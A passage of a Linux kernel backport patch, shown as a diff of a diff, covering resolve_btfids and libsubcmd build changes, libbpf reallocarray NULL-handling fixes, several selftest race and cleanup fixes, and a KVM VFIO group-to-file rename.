+ LIBBPF_DESTDIR := $(LIBBPF_OUT)
+ LIBBPF_INCLUDE := $(LIBBPF_DESTDIR)include
+ 
++SUBCMD_DESTDIR := $(SUBCMD_OUT)
++SUBCMD_INCLUDE := $(SUBCMD_DESTDIR)include
++
+ BINARY     := $(OUTPUT)/resolve_btfids
+ BINARY_IN  := $(BINARY)-in.o
+ 
+ all: $(BINARY)
+ 
++prepare: $(BPFOBJ) $(SUBCMDOBJ)
++
+ $(OUTPUT) $(OUTPUT)/libsubcmd $(LIBBPF_OUT):
+ 	$(call msg,MKDIR,,$@)
+ 	$(Q)mkdir -p $(@)
+ 
+ $(SUBCMDOBJ): fixdep FORCE | $(OUTPUT)/libsubcmd
+-	$(Q)$(MAKE) -C $(SUBCMD_SRC) OUTPUT=$(abspath $(dir $@))/ $(abspath $@)
++	$(Q)$(MAKE) -C $(SUBCMD_SRC) OUTPUT=$(SUBCMD_OUT) \
++		    DESTDIR=$(SUBCMD_DESTDIR) $(HOST_OVERRIDES) prefix= subdir= \
++		    $(abspath $@) install_headers
+ 
+ $(BPFOBJ): $(wildcard $(LIBBPF_SRC)/*.[ch] $(LIBBPF_SRC)/Makefile) | $(LIBBPF_OUT)
+ 	$(Q)$(MAKE) $(submake_extras) -C $(LIBBPF_SRC) OUTPUT=$(LIBBPF_OUT)    \
+-		    DESTDIR=$(LIBBPF_DESTDIR) prefix= EXTRA_CFLAGS="$(CFLAGS)" \
++		    DESTDIR=$(LIBBPF_DESTDIR) $(HOST_OVERRIDES) prefix= subdir= \
+ 		    $(abspath $@) install_headers
+ 
+-CFLAGS += -g \
++LIBELF_FLAGS := $(shell $(HOSTPKG_CONFIG) libelf --cflags 2>/dev/null)
++LIBELF_LIBS  := $(shell $(HOSTPKG_CONFIG) libelf --libs 2>/dev/null || echo -lelf)
++
++HOSTCFLAGS_resolve_btfids += -g \
+           -I$(srctree)/tools/include \
+           -I$(srctree)/tools/include/uapi \
+           -I$(LIBBPF_INCLUDE) \
+-          -I$(SUBCMD_SRC)
++          -I$(SUBCMD_INCLUDE) \
++          $(LIBELF_FLAGS)
+ 
+-LIBS = -lelf -lz
++LIBS = $(LIBELF_LIBS) -lz
+ 
+-export srctree OUTPUT CFLAGS Q
++export srctree OUTPUT HOSTCFLAGS_resolve_btfids Q HOSTCC HOSTLD HOSTAR
+ include $(srctree)/tools/build/Makefile.include
+ 
+-$(BINARY_IN): $(BPFOBJ) fixdep FORCE | $(OUTPUT)
++$(BINARY_IN): fixdep FORCE prepare | $(OUTPUT)
+ 	$(Q)$(MAKE) $(build)=resolve_btfids
+ 
+ $(BINARY): $(BPFOBJ) $(SUBCMDOBJ) $(BINARY_IN)
+ 	$(call msg,LINK,$@)
+-	$(Q)$(CC) $(BINARY_IN) $(LDFLAGS) -o $@ $(BPFOBJ) $(SUBCMDOBJ) $(LIBS)
++	$(Q)$(HOSTCC) $(BINARY_IN) $(KBUILD_HOSTLDFLAGS) -o $@ $(BPFOBJ) $(SUBCMDOBJ) $(LIBS)
+ 
+ clean_objects := $(wildcard $(OUTPUT)/*.o                \
+                             $(OUTPUT)/.*.o.cmd           \
+                             $(OUTPUT)/.*.o.d             \
+                             $(LIBBPF_OUT)                \
+                             $(LIBBPF_DESTDIR)            \
+-                            $(OUTPUT)/libsubcmd          \
++                            $(SUBCMD_OUT)                \
++                            $(SUBCMD_DESTDIR)            \
+                             $(OUTPUT)/resolve_btfids)
+ 
+ ifneq ($(clean_objects),)
+@@ -96,4 +109,4 @@ tags:
+ 
+ FORCE:
+ 
+-.PHONY: all FORCE clean tags
++.PHONY: all FORCE clean tags prepare
+diff --git a/tools/bpf/resolve_btfids/main.c b/tools/bpf/resolve_btfids/main.c
+index 80cd7843c6778..77058174082d7 100644
+--- a/tools/bpf/resolve_btfids/main.c
++++ b/tools/bpf/resolve_btfids/main.c
+@@ -75,7 +75,7 @@
+ #include <linux/err.h>
+ #include <bpf/btf.h>
+ #include <bpf/libbpf.h>
+-#include <parse-options.h>
++#include <subcmd/parse-options.h>
+ 
+ #define BTF_IDS_SECTION	".BTF_ids"
+ #define BTF_ID		"__BTF_ID__"
+diff --git a/tools/hv/vmbus_testing b/tools/hv/vmbus_testing
+index e7212903dd1d9..4467979d8f699 100755
+--- a/tools/hv/vmbus_testing
++++ b/tools/hv/vmbus_testing
+@@ -164,7 +164,7 @@ def recursive_file_lookup(path, file_map):
+ def get_all_devices_test_status(file_map):
+ 
+         for device in file_map:
+-                if (get_test_state(locate_state(device, file_map)) is 1):
++                if (get_test_state(locate_state(device, file_map)) == 1):
+                         print("Testing = ON for: {}"
+                               .format(device.split("/")[5]))
+                 else:
+@@ -203,7 +203,7 @@ def write_test_files(path, value):
+ def set_test_state(state_path, state_value, quiet):
+ 
+         write_test_files(state_path, state_value)
+-        if (get_test_state(state_path) is 1):
++        if (get_test_state(state_path) == 1):
+                 if (not quiet):
+                         print("Testing = ON for device: {}"
+                               .format(state_path.split("/")[5]))
+diff --git a/tools/lib/bpf/libbpf.c b/tools/lib/bpf/libbpf.c
+index b9a29d1053765..eeb2693128d8a 100644
+--- a/tools/lib/bpf/libbpf.c
++++ b/tools/lib/bpf/libbpf.c
+@@ -6063,7 +6063,11 @@ static int append_subprog_relos(struct bpf_program *main_prog, struct bpf_progra
+ 	if (main_prog == subprog)
+ 		return 0;
+ 	relos = libbpf_reallocarray(main_prog->reloc_desc, new_cnt, sizeof(*relos));
+-	if (!relos)
++	/* if new count is zero, reallocarray can return a valid NULL result;
++	 * in this case the previous pointer will be freed, so we *have to*
++	 * reassign old pointer to the new value (even if it's NULL)
++	 */
++	if (!relos && new_cnt)
+ 		return -ENOMEM;
+ 	if (subprog->nr_reloc)
+ 		memcpy(relos + main_prog->nr_reloc, subprog->reloc_desc,
+@@ -8345,7 +8349,8 @@ int bpf_program__set_insns(struct bpf_program *prog,
+ 		return -EBUSY;
+ 
+ 	insns = libbpf_reallocarray(prog->insns, new_insn_cnt, sizeof(*insns));
+-	if (!insns) {
++	/* NULL is a valid return from reallocarray if the new count is zero */
++	if (!insns && new_insn_cnt) {
+ 		pr_warn("prog '%s': failed to realloc prog code\n", prog->name);
+ 		return -ENOMEM;
+ 	}
+@@ -8640,7 +8645,11 @@ int libbpf_unregister_prog_handler(int handler_id)
+ 
+ 	/* try to shrink the array, but it's ok if we couldn't */
+ 	sec_defs = libbpf_reallocarray(custom_sec_defs, custom_sec_def_cnt, sizeof(*sec_defs));
+-	if (sec_defs)
++	/* if new count is zero, reallocarray can return a valid NULL result;
++	 * in this case the previous pointer will be freed, so we *have to*
++	 * reassign old pointer to the new value (even if it's NULL)
++	 */
++	if (sec_defs || custom_sec_def_cnt == 0)
+ 		custom_sec_defs = sec_defs;
+ 
+ 	return 0;
+diff --git a/tools/lib/bpf/usdt.c b/tools/lib/bpf/usdt.c
+index 49f3c3b7f6095..af1cb30556b46 100644
+--- a/tools/lib/bpf/usdt.c
++++ b/tools/lib/bpf/usdt.c
+@@ -852,8 +852,11 @@ static int bpf_link_usdt_detach(struct bpf_link *link)
+ 		 * system is so exhausted on memory, it's the least of user's
+ 		 * concerns, probably.
+ 		 * So just do our best here to return those IDs to usdt_manager.
++		 * Another edge case when we can legitimately get NULL is when
++		 * new_cnt is zero, which can happen in some edge cases, so we
++		 * need to be careful about that.
+ 		 */
+-		if (new_free_ids) {
++		if (new_free_ids || new_cnt == 0) {
+ 			memcpy(new_free_ids + man->free_spec_cnt, usdt_link->spec_ids,
+ 			       usdt_link->spec_cnt * sizeof(*usdt_link->spec_ids));
+ 			man->free_spec_ids = new_free_ids;
+diff --git a/tools/lib/subcmd/Makefile b/tools/lib/subcmd/Makefile
+index 8f1a09cdfd17e..b87213263a5e0 100644
+--- a/tools/lib/subcmd/Makefile
++++ b/tools/lib/subcmd/Makefile
+@@ -17,6 +17,15 @@ RM = rm -f
+ 
+ MAKEFLAGS += --no-print-directory
+ 
++INSTALL = install
++
++# Use DESTDIR for installing into a different root directory.
++# This is useful for building a package. The program will be
++# installed in this directory as if it was the root directory.
++# Then the build tool can move it later.
++DESTDIR ?=
++DESTDIR_SQ = '$(subst ','\'',$(DESTDIR))'
++
+ LIBFILE = $(OUTPUT)libsubcmd.a
+ 
+ CFLAGS := -ggdb3 -Wall -Wextra -std=gnu99 -fPIC
+@@ -48,6 +57,18 @@ CFLAGS += $(EXTRA_WARNINGS) $(EXTRA_CFLAGS)
+ 
+ SUBCMD_IN := $(OUTPUT)libsubcmd-in.o
+ 
++ifeq ($(LP64), 1)
++  libdir_relative = lib64
++else
++  libdir_relative = lib
++endif
++
++prefix ?=
++libdir = $(prefix)/$(libdir_relative)
++
++# Shell quotes
++libdir_SQ = $(subst ','\'',$(libdir))
++
+ all:
+ 
+ export srctree OUTPUT CC LD CFLAGS V
+@@ -61,6 +82,37 @@ $(SUBCMD_IN): FORCE
+ $(LIBFILE): $(SUBCMD_IN)
+ 	$(QUIET_AR)$(RM) $@ && $(AR) rcs $@ $(SUBCMD_IN)
+ 
++define do_install_mkdir
++	if [ ! -d '$(DESTDIR_SQ)$1' ]; then             \
++		$(INSTALL) -d -m 755 '$(DESTDIR_SQ)$1'; \
++	fi
++endef
++
++define do_install
++	if [ ! -d '$2' ]; then             \
++		$(INSTALL) -d -m 755 '$2'; \
++	fi;                                             \
++	$(INSTALL) $1 $(if $3,-m $3,) '$2'
++endef
++
++install_lib: $(LIBFILE)
++	$(call QUIET_INSTALL, $(LIBFILE)) \
++		$(call do_install_mkdir,$(libdir_SQ)); \
++		cp -fpR $(LIBFILE) $(DESTDIR)$(libdir_SQ)
++
++HDRS := exec-cmd.h help.h pager.h parse-options.h run-command.h
++INSTALL_HDRS_PFX := $(DESTDIR)$(prefix)/include/subcmd
++INSTALL_HDRS := $(addprefix $(INSTALL_HDRS_PFX)/, $(HDRS))
++
++$(INSTALL_HDRS): $(INSTALL_HDRS_PFX)/%.h: %.h
++	$(call QUIET_INSTALL, $@) \
++		$(call do_install,$<,$(INSTALL_HDRS_PFX)/,644)
++
++install_headers: $(INSTALL_HDRS)
++	$(call QUIET_INSTALL, libsubcmd_headers)
++
++install: install_lib install_headers
++
+ clean:
+ 	$(call QUIET_CLEAN, libsubcmd) $(RM) $(LIBFILE); \
+ 	find $(or $(OUTPUT),.) -name \*.o -or -name \*.o.cmd -or -name \*.o.d | xargs $(RM)
+diff --git a/tools/testing/radix-tree/multiorder.c b/tools/testing/radix-tree/multiorder.c
+index e00520cc63498..cffaf2245d4f1 100644
+--- a/tools/testing/radix-tree/multiorder.c
++++ b/tools/testing/radix-tree/multiorder.c
+@@ -159,7 +159,7 @@ void multiorder_tagged_iteration(struct xarray *xa)
+ 	item_kill_tree(xa);
+ }
+ 
+-bool stop_iteration = false;
++bool stop_iteration;
+ 
+ static void *creator_func(void *ptr)
+ {
+@@ -201,6 +201,7 @@ static void multiorder_iteration_race(struct xarray *xa)
+ 	pthread_t worker_thread[num_threads];
+ 	int i;
+ 
++	stop_iteration = false;
+ 	pthread_create(&worker_thread[0], NULL, &creator_func, xa);
+ 	for (i = 1; i < num_threads; i++)
+ 		pthread_create(&worker_thread[i], NULL, &iterator_func, xa);
+@@ -211,6 +212,61 @@ static void multiorder_iteration_race(struct xarray *xa)
+ 	item_kill_tree(xa);
+ }
+ 
++static void *load_creator(void *ptr)
++{
++	/* 'order' is set up to ensure we have sibling entries */
++	unsigned int order;
++	struct radix_tree_root *tree = ptr;
++	int i;
++
++	rcu_register_thread();
++	item_insert_order(tree, 3 << RADIX_TREE_MAP_SHIFT, 0);
++	item_insert_order(tree, 2 << RADIX_TREE_MAP_SHIFT, 0);
++	for (i = 0; i < 10000; i++) {
++		for (order = 1; order < RADIX_TREE_MAP_SHIFT; order++) {
++			unsigned long index = (3 << RADIX_TREE_MAP_SHIFT) -
++						(1 << order);
++			item_insert_order(tree, index, order);
++			item_delete_rcu(tree, index);
++		}
++	}
++	rcu_unregister_thread();
++
++	stop_iteration = true;
++	return NULL;
++}
++
++static void *load_worker(void *ptr)
++{
++	unsigned long index = (3 << RADIX_TREE_MAP_SHIFT) - 1;
++
++	rcu_register_thread();
++	while (!stop_iteration) {
++		struct item *item = xa_load(ptr, index);
++		assert(!xa_is_internal(item));
++	}
++	rcu_unregister_thread();
++
++	return NULL;
++}
++
++static void load_race(struct xarray *xa)
++{
++	const int num_threads = sysconf(_SC_NPROCESSORS_ONLN) * 4;
++	pthread_t worker_thread[num_threads];
++	int i;
++
++	stop_iteration = false;
++	pthread_create(&worker_thread[0], NULL, &load_creator, xa);
++	for (i = 1; i < num_threads; i++)
++		pthread_create(&worker_thread[i], NULL, &load_worker, xa);
++
++	for (i = 0; i < num_threads; i++)
++		pthread_join(worker_thread[i], NULL);
++
++	item_kill_tree(xa);
++}
++
+ static DEFINE_XARRAY(array);
+ 
+ void multiorder_checks(void)
+@@ -218,12 +274,20 @@ void multiorder_checks(void)
+ 	multiorder_iteration(&array);
+ 	multiorder_tagged_iteration(&array);
+ 	multiorder_iteration_race(&array);
++	load_race(&array);
+ 
+ 	radix_tree_cpu_dead(0);
+ }
+ 
+-int __weak main(void)
++int __weak main(int argc, char **argv)
+ {
++	int opt;
++
++	while ((opt = getopt(argc, argv, "ls:v")) != -1) {
++		if (opt == 'v')
++			test_verbose++;
++	}
++
+ 	rcu_register_thread();
+ 	radix_tree_init();
+ 	multiorder_checks();
+diff --git a/tools/testing/selftests/bpf/benchs/run_bench_rename.sh b/tools/testing/selftests/bpf/benchs/run_bench_rename.sh
+index 16f774b1cdbed..7b281dbe41656 100755
+--- a/tools/testing/selftests/bpf/benchs/run_bench_rename.sh
++++ b/tools/testing/selftests/bpf/benchs/run_bench_rename.sh
+@@ -2,7 +2,7 @@
+ 
+ set -eufo pipefail
+ 
+-for i in base kprobe kretprobe rawtp fentry fexit fmodret
++for i in base kprobe kretprobe rawtp fentry fexit
+ do
+ 	summary=$(sudo ./bench -w2 -d5 -a rename-$i | tail -n1 | cut -d'(' -f1 | cut -d' ' -f3-)
+ 	printf "%-10s: %s\n" $i "$summary"
+diff --git a/tools/testing/selftests/bpf/prog_tests/bpf_nf.c b/tools/testing/selftests/bpf/prog_tests/bpf_nf.c
+index 8a838ea8bdf3b..b2998896f9f7b 100644
+--- a/tools/testing/selftests/bpf/prog_tests/bpf_nf.c
++++ b/tools/testing/selftests/bpf/prog_tests/bpf_nf.c
+@@ -123,12 +123,13 @@ static void test_bpf_nf_ct(int mode)
+ 	ASSERT_EQ(skel->data->test_snat_addr, 0, "Test for source natting");
+ 	ASSERT_EQ(skel->data->test_dnat_addr, 0, "Test for destination natting");
+ end:
+-	if (srv_client_fd != -1)
+-		close(srv_client_fd);
+ 	if (client_fd != -1)
+ 		close(client_fd);
++	if (srv_client_fd != -1)
++		close(srv_client_fd);
+ 	if (srv_fd != -1)
+ 		close(srv_fd);
++
+ 	snprintf(cmd, sizeof(cmd), iptables, "-D");
+ 	system(cmd);
+ 	test_bpf_nf__destroy(skel);
+diff --git a/tools/testing/selftests/bpf/prog_tests/kfunc_call.c b/tools/testing/selftests/bpf/prog_tests/kfunc_call.c
+index 5af1ee8f0e6ee..36071f3f15ba1 100644
+--- a/tools/testing/selftests/bpf/prog_tests/kfunc_call.c
++++ b/tools/testing/selftests/bpf/prog_tests/kfunc_call.c
+@@ -171,8 +171,8 @@ static void verify_fail(struct kfunc_test_params *param)
+ 	case tc_test:
+ 		topts.data_in = &pkt_v4;
+ 		topts.data_size_in = sizeof(pkt_v4);
+-		break;
+ 		topts.repeat = 1;
++		break;
+ 	}
+ 
+ 	skel = kfunc_call_fail__open_opts(&opts);
+diff --git a/tools/testing/selftests/bpf/progs/test_cls_redirect.h b/tools/testing/selftests/bpf/progs/test_cls_redirect.h
+index 76eab0aacba0c..233b089d1fbac 100644
+--- a/tools/testing/selftests/bpf/progs/test_cls_redirect.h
++++ b/tools/testing/selftests/bpf/progs/test_cls_redirect.h
+@@ -12,6 +12,15 @@
+ #include <linux/ipv6.h>
+ #include <linux/udp.h>
+ 
++/* offsetof() is used in static asserts, and the libbpf-redefined CO-RE
++ * friendly version breaks compilation for older clang versions <= 15
++ * when invoked in a static assert.  Restore original here.
++ */
++#ifdef offsetof
++#undef offsetof
++#define offsetof(type, member) __builtin_offsetof(type, member)
++#endif
++
+ struct gre_base_hdr {
+ 	uint16_t flags;
+ 	uint16_t protocol;
+diff --git a/tools/testing/selftests/futex/functional/futex_wait_timeout.c b/tools/testing/selftests/futex/functional/futex_wait_timeout.c
+index 3651ce17beeb9..d183f878360bc 100644
+--- a/tools/testing/selftests/futex/functional/futex_wait_timeout.c
++++ b/tools/testing/selftests/futex/functional/futex_wait_timeout.c
+@@ -24,6 +24,7 @@
+ 
+ static long timeout_ns = 100000;	/* 100us default timeout */
+ static futex_t futex_pi;
++static pthread_barrier_t barrier;
+ 
+ void usage(char *prog)
+ {
+@@ -48,6 +49,8 @@ void *get_pi_lock(void *arg)
+ 	if (ret != 0)
+ 		error("futex_lock_pi failed\n", ret);
+ 
++	pthread_barrier_wait(&barrier);
++
+ 	/* Blocks forever */
+ 	ret = futex_wait(&lock, 0, NULL, 0);
+ 	error("futex_wait failed\n", ret);
+@@ -130,6 +133,7 @@ int main(int argc, char *argv[])
+ 	       basename(argv[0]));
+ 	ksft_print_msg("\tArguments: timeout=%ldns\n", timeout_ns);
+ 
++	pthread_barrier_init(&barrier, NULL, 2);
+ 	pthread_create(&thread, NULL, get_pi_lock, NULL);
+ 
+ 	/* initialize relative timeout */
+@@ -163,6 +167,9 @@ int main(int argc, char *argv[])
+ 	res = futex_wait_requeue_pi(&f1, f1, &futex_pi, &to, 0);
+ 	test_timeout(res, &ret, "futex_wait_requeue_pi monotonic", ETIMEDOUT);
+ 
++	/* Wait until the other thread calls futex_lock_pi() */
++	pthread_barrier_wait(&barrier);
++	pthread_barrier_destroy(&barrier);
+ 	/*
+ 	 * FUTEX_LOCK_PI with CLOCK_REALTIME
+ 	 * Due to historical reasons, FUTEX_LOCK_PI supports only realtime
+diff --git a/tools/testing/selftests/kselftest_harness.h b/tools/testing/selftests/kselftest_harness.h
+index 25f4d54067c0e..584687c3286dd 100644
+--- a/tools/testing/selftests/kselftest_harness.h
++++ b/tools/testing/selftests/kselftest_harness.h
+@@ -937,7 +937,11 @@ void __wait_for_test(struct __test_metadata *t)
+ 		fprintf(TH_LOG_STREAM,
+ 			"# %s: Test terminated by timeout\n", t->name);
+ 	} else if (WIFEXITED(status)) {
+-		if (t->termsig != -1) {
++		if (WEXITSTATUS(status) == 255) {
++			/* SKIP */
++			t->passed = 1;
++			t->skip = 1;
++		} else if (t->termsig != -1) {
+ 			t->passed = 0;
+ 			fprintf(TH_LOG_STREAM,
+ 				"# %s: Test exited normally instead of by signal (code: %d)\n",
+@@ -949,11 +953,6 @@ void __wait_for_test(struct __test_metadata *t)
+ 			case 0:
+ 				t->passed = 1;
+ 				break;
+-			/* SKIP */
+-			case 255:
+-				t->passed = 1;
+-				t->skip = 1;
+-				break;
+ 			/* Other failure, assume step report. */
+ 			default:
+ 				t->passed = 0;
+diff --git a/tools/testing/selftests/resctrl/Makefile b/tools/testing/selftests/resctrl/Makefile
+index 73d53257df42f..5073dbc961258 100644
+--- a/tools/testing/selftests/resctrl/Makefile
++++ b/tools/testing/selftests/resctrl/Makefile
+@@ -7,4 +7,4 @@ TEST_GEN_PROGS := resctrl_tests
+ 
+ include ../lib.mk
+ 
+-$(OUTPUT)/resctrl_tests: $(wildcard *.c)
++$(OUTPUT)/resctrl_tests: $(wildcard *.[ch])
+diff --git a/tools/testing/selftests/resctrl/cache.c b/tools/testing/selftests/resctrl/cache.c
+index 0485863a169f2..338f714453935 100644
+--- a/tools/testing/selftests/resctrl/cache.c
++++ b/tools/testing/selftests/resctrl/cache.c
+@@ -89,21 +89,19 @@ static int reset_enable_llc_perf(pid_t pid, int cpu_no)
+ static int get_llc_perf(unsigned long *llc_perf_miss)
+ {
+ 	__u64 total_misses;
++	int ret;
+ 
+ 	/* Stop counters after one span to get miss rate */
+ 
+ 	ioctl(fd_lm, PERF_EVENT_IOC_DISABLE, 0);
+ 
+-	if (read(fd_lm, &rf_cqm, sizeof(struct read_format)) == -1) {
++	ret = read(fd_lm, &rf_cqm, sizeof(struct read_format));
++	if (ret == -1) {
+ 		perror("Could not get llc misses through perf");
+-
+ 		return -1;
+ 	}
+ 
+ 	total_misses = rf_cqm.values[0].value;
+-
+-	close(fd_lm);
+-
+ 	*llc_perf_miss = total_misses;
+ 
+ 	return 0;
+@@ -258,19 +256,25 @@ int cat_val(struct resctrl_val_param *param)
+ 					 memflush, operation, resctrl_val)) {
+ 				fprintf(stderr, "Error-running fill buffer\n");
+ 				ret = -1;
+-				break;
++				goto pe_close;
+ 			}
+ 
+ 			sleep(1);
+ 			ret = measure_cache_vals(param, bm_pid);
+ 			if (ret)
+-				break;
++				goto pe_close;
++
++			close(fd_lm);
+ 		} else {
+ 			break;
+ 		}
+ 	}
+ 
+ 	return ret;
++
++pe_close:
++	close(fd_lm);
++	return ret;
+ }
+ 
+ /*
+diff --git a/tools/testing/selftests/resctrl/fill_buf.c b/tools/testing/selftests/resctrl/fill_buf.c
+index c20d0a7ecbe63..ab1d91328d67b 100644
+--- a/tools/testing/selftests/resctrl/fill_buf.c
++++ b/tools/testing/selftests/resctrl/fill_buf.c
+@@ -184,12 +184,13 @@ fill_cache(unsigned long long buf_size, int malloc_and_init, int memflush,
+ 	else
+ 		ret = fill_cache_write(start_ptr, end_ptr, resctrl_val);
+ 
++	free(startptr);
++
+ 	if (ret) {
+ 		printf("\n Error in fill cache read/write...\n");
+ 		return -1;
+ 	}
+ 
+-	free(startptr);
+ 
+ 	return 0;
+ }
+diff --git a/tools/testing/selftests/resctrl/resctrl.h b/tools/testing/selftests/resctrl/resctrl.h
+index f44fa2de4d986..dbe5cfb545585 100644
+--- a/tools/testing/selftests/resctrl/resctrl.h
++++ b/tools/testing/selftests/resctrl/resctrl.h
+@@ -43,6 +43,7 @@
+ 	do {					\
+ 		perror(err_msg);		\
+ 		kill(ppid, SIGKILL);		\
++		umount_resctrlfs();		\
+ 		exit(EXIT_FAILURE);		\
+ 	} while (0)
+ 
+diff --git a/virt/kvm/vfio.c b/virt/kvm/vfio.c
+index 9584eb57e0eda..365d30779768a 100644
+--- a/virt/kvm/vfio.c
++++ b/virt/kvm/vfio.c
+@@ -21,7 +21,7 @@
+ #include <asm/kvm_ppc.h>
+ #endif
+ 
+-struct kvm_vfio_group {
++struct kvm_vfio_file {
+ 	struct list_head node;
+ 	struct file *file;
+ #ifdef CONFIG_SPAPR_TCE_IOMMU
+@@ -30,7 +30,7 @@ struct kvm_vfio_group {
+ };
+ 
+ struct kvm_vfio {
+-	struct list_head group_list;
++	struct list_head file_list;
+ 	struct mutex lock;
+ 	bool noncoherent;
+ };
+@@ -98,34 +98,35 @@ static struct iommu_group *kvm_vfio_file_iommu_group(struct file *file)
+ }
+ 
+ static void kvm_spapr_tce_release_vfio_group(struct kvm *kvm,
+-					     struct kvm_vfio_group *kvg)
++					     struct kvm_vfio_file *kvf)
+ {
+-	if (WARN_ON_ONCE(!kvg->iommu_group))
++	if (WARN_ON_ONCE(!kvf->iommu_group))
+ 		return;
+ 
+-	kvm_spapr_tce_release_iommu_group(kvm, kvg->iommu_group);
+-	iommu_group_put(kvg->iommu_group);
+-	kvg->iommu_group = NULL;
++	kvm_spapr_tce_release_iommu_group(kvm, kvf->iommu_group);
++	iommu_group_put(kvf->iommu_group);
++	kvf->iommu_group = NULL;
+ }
+ #endif
+ 
+ /*
+- * Groups can use the same or different IOMMU domains.  If the same then
+- * adding a new group may change the coherency of groups we've previously
+- * been told about.  We don't want to care about any of that so we retest
+- * each group and bail as soon as we find one that's noncoherent.  This
+- * means we only ever [un]register_noncoherent_dma once for the whole device.
++ * Groups/devices can use the same or different IOMMU domains. If the same
++ * then adding a new group/device may change the coherency of groups/devices
++ * we've previously been told about. We don't want to care about any of
++ * that so we retest each group/device and bail as soon as we find one that's
++ * noncoherent.  This means we only ever [un]register_noncoherent_dma once
++ * for the whole device.
+  */
+ static void kvm_vfio_update_coherency(struct kvm_device *dev)
+ {
+ 	struct kvm_vfio *kv = dev->private;
+ 	bool noncoherent = false;
+-	struct kvm_vfio_group *kvg;
++	struct kvm_vfio_file *kvf;
+ 
+ 	mutex_lock(&kv->lock);
+ 
+-	list_for_each_entry(kvg, &kv->group_list, node) {
+-		if (!kvm_vfio_file_enforced_coherent(kvg->file)) {
++	list_for_each_entry(kvf, &kv->file_list, node) {
++		if (!kvm_vfio_file_enforced_coherent(kvf->file)) {
+ 			noncoherent = true;
+ 			break;
+ 		}
+@@ -143,10 +144,10 @@ static void kvm_vfio_update_coherency(struct kvm_device *dev)
+ 	mutex_unlock(&kv->lock);
+ }
+ 
+-static int kvm_vfio_group_add(struct kvm_device *dev, unsigned int fd)
++static int kvm_vfio_file_add(struct kvm_device *dev, unsigned int fd)
+ {
+ 	struct kvm_vfio *kv = dev->private;
+-	struct kvm_vfio_group *kvg;
++	struct kvm_vfio_file *kvf;
+ 	struct file *filp;
+ 	int ret;
+ 
+@@ -162,27 +163,27 @@ static int kvm_vfio_group_add(struct kvm_device *dev, unsigned int fd)
+ 
+ 	mutex_lock(&kv->lock);
+ 
+-	list_for_each_entry(kvg, &kv->group_list, node) {
+-		if (kvg->file == filp) {
++	list_for_each_entry(kvf, &kv->file_list, node) {
++		if (kvf->file == filp) {
+ 			ret = -EEXIST;
+ 			goto err_unlock;
+ 		}
+ 	}
+ 
+-	kvg = kzalloc(sizeof(*kvg), GFP_KERNEL_ACCOUNT);
+-	if (!kvg) {
++	kvf = kzalloc(sizeof(*kvf), GFP_KERNEL_ACCOUNT);
++	if (!kvf) {
+ 		ret = -ENOMEM;
+ 		goto err_unlock;
+ 	}
+ 
+-	kvg->file = filp;
+-	list_add_tail(&kvg->node, &kv->group_list);
++	kvf->file = filp;
++	list_add_tail(&kvf->node, &kv->file_list);
+ 
+ 	kvm_arch_start_assignment(dev->kvm);
++	kvm_vfio_file_set_kvm(kvf->file, dev->kvm);
+ 
+ 	mutex_unlock(&kv->lock);
+ 
+-	kvm_vfio_file_set_kvm(kvg->file, dev->kvm);
+ 	kvm_vfio_update_coherency(dev);
+ 
+ 	return 0;
+@@ -193,10 +194,10 @@ err_fput:
+ 	return ret;
+ }
+ 
+-static int kvm_vfio_group_del(struct kvm_device *dev, unsigned int fd)
++static int kvm_vfio_file_del(struct kvm_device *dev, unsigned int fd)
+ {
+ 	struct kvm_vfio *kv = dev->private;
+-	struct kvm_vfio_group *kvg;
++	struct kvm_vfio_file *kvf;
+ 	struct fd f;
+ 	int ret;
+ 
+@@ -208,18 +209,18 @@ static int kvm_vfio_group_del(struct kvm_device *dev, unsigned int fd)
+ 
+ 	mutex_lock(&kv->lock);
+ 
+-	list_for_each_entry(kvg, &kv->group_list, node) {
+-		if (kvg->file != f.file)
++	list_for_each_entry(kvf, &kv->file_list, node) {
++		if (kvf->file != f.file)
+ 			continue;
+ 
+-		list_del(&kvg->node);
++		list_del(&kvf->node);
+ 		kvm_arch_end_assignment(dev->kvm);
+ #ifdef CONFIG_SPAPR_TCE_IOMMU
+-		kvm_spapr_tce_release_vfio_group(dev->kvm, kvg);
++		kvm_spapr_tce_release_vfio_group(dev->kvm, kvf);
+ #endif
+-		kvm_vfio_file_set_kvm(kvg->file, NULL);
+-		fput(kvg->file);
+-		kfree(kvg);
++		kvm_vfio_file_set_kvm(kvf->file, NULL);
++		fput(kvf->file);
++		kfree(kvf);
+ 		ret = 0;
+ 		break;
+ 	}
+@@ -234,12 +235,12 @@ static int kvm_vfio_group_del(struct kvm_device *dev, unsigned int fd)
+ }
+ 
+ #ifdef CONFIG_SPAPR_TCE_IOMMU
+-static int kvm_vfio_group_set_spapr_tce(struct kvm_device *dev,
+-					void __user *arg)
++static int kvm_vfio_file_set_spapr_tce(struct kvm_device *dev,
++				       void __user *arg)
+ {
+ 	struct kvm_vfio_spapr_tce param;
+ 	struct kvm_vfio *kv = dev->private;
+-	struct kvm_vfio_group *kvg;
++	struct kvm_vfio_file *kvf;
+ 	struct fd f;
+ 	int ret;
+ 
+@@ -254,20 +255,20 @@ static int kvm_vfio_group_set_spapr_tce(struct kvm_device *dev,
+ 
+ 	mutex_lock(&kv->lock);
+ 
+-	list_for_each_entry(kvg, &kv->group_list, node) {
+-		if (kvg->file != f.file)
++	list_for_each_entry(kvf, &kv->file_list, node) {
++		if (kvf->file != f.file)
+ 			continue;
+ 
+-		if (!kvg->iommu_group) {
+-			kvg->iommu_group = kvm_vfio_file_iommu_group(kvg->file);
+-			if (WARN_ON_ONCE(!kvg->iommu_group)) {
++		if (!kvf->iommu_group) {
++			kvf->iommu_group = kvm_vfio_file_iommu_group(kvf->file);
++			if (WARN_ON_ONCE(!kvf->iommu_group)) {
+ 				ret = -EIO;
+ 				goto err_fdput;
+ 			}
+ 		}
+ 
+ 		ret = kvm_spapr_tce_attach_iommu_group(dev->kvm, param.tablefd,
+-						       kvg->iommu_group);
++						       kvf->iommu_group);
+ 		break;
+ 	}
+ 
+@@ -278,8 +279,8 @@ err_fdput:
+ }
+ #endif
+ 
+-static int kvm_vfio_set_group(struct kvm_device *dev, long attr,
+-			      void __user *arg)
++static int kvm_vfio_set_file(struct kvm_device *dev, long attr,
++			     void __user *arg)
+ {
+ 	int32_t __user *argp = arg;
+ 	int32_t fd;
+@@ -288,16 +289,16 @@ static int kvm_vfio_set_group(struct kvm_device *dev, long attr,
+ 	case KVM_DEV_VFIO_GROUP_ADD:
+ 		if (get_user(fd, argp))
+ 			return -EFAULT;
+-		return kvm_vfio_group_add(dev, fd);
